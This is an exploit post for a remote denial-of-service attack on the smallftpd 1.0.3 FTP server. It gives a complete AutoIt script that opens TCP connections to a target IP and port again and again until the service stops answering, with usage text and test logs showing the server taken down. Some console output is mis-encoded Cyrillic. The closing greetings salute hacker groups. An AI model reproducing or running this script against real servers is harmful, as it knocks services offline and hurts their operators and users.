SmallFTPd 1.0.3 Denial Of Service

`#NoTrayIcon  
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****  
#AutoIt3Wrapper_Outfile=aas.exe  
#AutoIt3Wrapper_UseUpx=n  
#AutoIt3Wrapper_Change2CUI=y  
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****  
  
#cs  
smallftpd 1.0.3.dos.au3  
  
smallftpd 1.0.3 Denial Of Service (Remote Crash) exploit;  
This is simple exploit written in AutoIT that crashes Remote/Local smallftpd 1.0.3 FTP server  
If you want to use exploit then you've to compile it as CUI application.  
Official site of smallftpd 1.0.3 : =>  
http://smallftpd.free.fr/  
http://smallftpd.sourceforge.net/  
http://sourceforge.net/projects/smallftpd/files/latest/download  
  
=====================================================  
Tested *remotely*: From Windows Server 2003 against Win XP SP2 (32 bit)  
that runs smallftpd 1.0.3. Result: Remote denial of Service;App crashed.  
=====================================================  
Tested (local scope) From Win XP SP 2 (32 bit)(192.168.0.1) against Win XP SP 2 32 bit( 192.168.0.15)  
that runs smallftpd 1.0.3.  
Result: Remote denial of Service;App crashed.  
=====================================================  
Tested (local scope) from Win XP SP 2(32 bit) (192.168.0.1) against Windows 7 Ultimate SP 1 ( 192.168.0.15)  
that runs smallftpd 1.0.3. (<- with XP SP3 compatible mode)  
Result: Application didn't crashed but it is unable to accept any connection to port 21.  
  
  
Here is the later testing result:  
  
c:\dos\smalf\>ping 192.168.0.15  
  
Îáìåí ïàêåòàìè ñ 192.168.0.15 ïî 32 áàéò:  
  
Îòâåò îò 192.168.0.15: ÷èñëî áàéò=32 âðåìÿ=2ìñ TTL=128  
Îòâåò îò 192.168.0.15: ÷èñëî áàéò=32 âðåìÿ=5ìñ TTL=128cls  
  
Ñòàòèñòèêà Ping äëÿ 192.168.0.15:  
Ïàêåòîâ: îòïðàâëåíî = 2, ïîëó÷åíî = 2, ïîòåðÿíî = 0 (0% ïîòåðü),  
Ïðèáëèçèòåëüíîå âðåìÿ ïðèåìà-ïåðåäà÷è â ìñ:  
  
c:\dos\smalf\>telnet 192.168.0.15 21  
220- smallftpd 1.0.3  
220- check http://smallftpd.free.fr for more information  
220 report bugs to [email protected]  
¦  
530 Not logged in.  
  
c:\dos\smalf\>aas.exe 192.168.0.15 21  
  
##############################################################  
########## smallftpd 1.0.3 DENIAL OF SERVICE exploit #######  
########## Usage: aas.exe REMOTEIP REMOTEPORT ##########  
\\\\\\\\\\ HACKING IS LIFESTYLE! //////////  
##############################################################  
  
################ WORKING ON IT! PLEASE WAIT...################  
--------------------------------------------------------------  
~ TRY count: ~ 40  
--------------------------------------------------------------  
--------------------------------------------------------------  
~ TRY count: ~ 80  
--------------------------------------------------------------  
--------------------------------------------------------------  
~ TRY count: ~ 120  
--------------------------------------------------------------  
--------------------------------------------------------------  
~ TRY count: ~ 160  
--------------------------------------------------------------  
--------------------------------------------------------------  
~ TRY count: ~ 200  
--------------------------------------------------------------  
--------------------------------------------------------------  
~ TRY count: ~ 240  
--------------------------------------------------------------  
##############################################################  
########## Mission Completed! @267 ##########  
TARGET =>ftp://192.168.0.15:21/ is * DOWN ! *  
##############################################################  
c:\dos\smalf\>telnet 192.168.0.15 21  
Ïîäêëþ÷åíèå ê 192.168.0.15...Íå óäàëîñü îòêðûòü ïîäêëþ÷åíèå ê ýòîìó óçëó, íà ïîðò 21: Ñáîé ïîäêëþ÷åíèÿ  
  
c:\dos\smalf\>telnet 192.168.0.15 21  
Ïîäêëþ÷åíèå ê 192.168.0.15...Íå óäàëîñü îòêðûòü ïîäêëþ÷åíèå ê ýòîìó óçëó, íà ïîðò 21: Ñáîé ïîäêëþ÷åíèÿ  
  
c:\dos\smalf\>ping 192.168.0.15  
  
Îáìåí ïàêåòàìè ñ 192.168.0.15 ïî 32 áàéò:  
  
Îòâåò îò 192.168.0.15: ÷èñëî áàéò=32 âðåìÿ=1ìñ TTL=128  
Îòâåò îò 192.168.0.15: ÷èñëî áàéò=32 âðåìÿ=1ìñ TTL=128  
  
Ñòàòèñòèêà Ping äëÿ 192.168.0.15:  
Ïàêåòîâ: îòïðàâëåíî = 2, ïîëó÷åíî = 2, ïîòåðÿíî = 0 (0% ïîòåðü),  
Ïðèáëèçèòåëüíîå âðåìÿ ïðèåìà-ïåðåäà÷è â ìñ:  
Ìèíèìàëüíîå = 1ìñåê, Ìàêñèìàëüíîå = 1 ìñåê, Ñðåäíåå = 1 ìñåê  
Control-C  
^C  
c:\dos\smalf\>telnet 192.168.0.15 21  
Ïîäêëþ÷åíèå ê 192.168.0.15...Íå óäàëîñü îòêðûòü ïîäêëþ÷åíèå ê ýòîìó óçëó, íà ïîðò 21: Ñáîé ïîäêëþ÷åíèÿ  
  
c:\dos\smalf\>ipconfig|find /i "192.168"  
IP-ðô¨õ¸ . . . . . . . . . . . . : 192.168.0.1  
+¸ýþòýþù °û¦÷ . . . . . . . . . . : 192.168.0.1  
  
  
  
  
  
  
/AkaStep  
  
  
#ce  
#include <String.au3>  
  
  
  
  
  
$f=_StringRepeat('#',10);  
$USE_PROTO='ftp://';  
$INVALIDIP='INVALID IP FORMAT';  
$INVALIDPORT='INVALID PORT NUMBER!';  
$HTTPUA='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';  
$msg_usage=$f & ' smallftpd 1.0.3 DENIAL OF SERVICE exploit ' & StringMid($f,1,7) & @CRLF & _  
$f & " Usage: " & _  
@ScriptName & ' REMOTEIP ' & ' REMOTEPORT ' & $f & @CRLF & _  
StringReplace($f,'#','\') & _StringRepeat(' ',10) & _  
'HACKING IS LIFESTYLE!' & _StringRepeat(' ',10) & StringReplace($f,'#','/')  
  
if $CmdLine[0]=0 Then  
MsgBox(64,"","This is a console Application!" & @CRLF & 'More Info: ' & @ScriptName & ' --help' & @CRLF & _  
'Invoke It from MSDOS!',5)  
exit;  
EndIf  
if $CmdLine[0] <> 2 Then  
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);  
exit;  
EndIf  
  
$ip=StringMid($CmdLine[1],1,15);//255.255.255.255  
$port=StringMid($CmdLine[2],1,5);//65535  
  
validateall($ip,$port)  
  
func validateall($ip,$port)  
if not StringIsDigit($port) Or NOT (Number($port)<=65535) Then  
ConsoleWrite($INVALIDPORT);  
Exit;  
EndIf  
  
TCPStartup();  
$ip=TCPNameToIP($ip);  
TCPShutdown();  
  
$z=StringSplit($ip,Chr(46));//Asc('.')  
if @error then  
ConsoleWrite($INVALIDIP);  
exit;  
EndIf  
  
for $x=0 to $z[0]  
if Number($z[0]-1) <>3 Then  
ConsoleWrite($INVALIDIP);  
Exit  
EndIf  
  
if $x>=1 AND Not StringIsDigit($z[$x]) Or StringLen($z[$x])>3 Then  
ConsoleWrite($INVALIDIP);  
exit;  
EndIf  
Next  
  
$x=0;  
  
ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);  
ConsoleWrite(@CRLF & $f & _StringRepeat('#',6) & ' WORKING ON IT! PLEASE WAIT...' & _StringRepeat('#',6) & $f & @CRLF)  
  
downit($ip,$port,$x)  
  
EndFunc; =>validateall($ip,$port)  
  
  
  
Func downit($ip,$port,$x)  
$x+=1;  
TCPStartup()  
$socket_con = -1  
$socket_con = TCPConnect($ip, $port)  
If not @error Then  
  
  
if Mod($x,40)=0 Then  
ConsoleWrite(_StringRepeat('-',62) & @CRLF & '~ TRY count: ~ ' & $x & @CRLF & _StringRepeat('-',62) & @CRLF)  
Sleep(Random(1000,1800,1));  
EndIf  
  
downit($ip,$port,$x)  
  
  
Else  
  
Beep(1000,1500)  
ConsoleWrite(_StringRepeat('#',62) & @CRLF & $f & _StringRepeat(' ',12) & 'Mission Completed! @' & $x & _StringRepeat(' ',12) & $f & @CRLF & _  
_StringRepeat(' ',5) & ' TARGET =>' & StringLower($USE_PROTO & $ip & ':' & $port) & '/ is * DOWN ! * ' & @CRLF & _StringRepeat('#',62));  
  
  
TCPShutdown();  
exit;  
EndIf  
EndFunc; ==>downit($ip,$port,$x)  
  
  
#cs  
  
================================================  
KUDOSSSSSSS  
================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
osvdb.com  
websecurity.com.ua  
1337day.com  
itsecuritysolutions.org  
waraxe.us  
exploit-db.com  
  
to all Aa Team + to all Azerbaijan Black HatZ  
+ *Especially to my bro CAMOUFL4G3 *  
To All Turkish Hackers  
  
Also special thanks to: ottoman38 & HERO_AZE  
  
*Super special KUDOS to my bro Brendan Coles!  
Love you and Respect you dude!  
Thank you!*  
================================================  
  
#ce  
`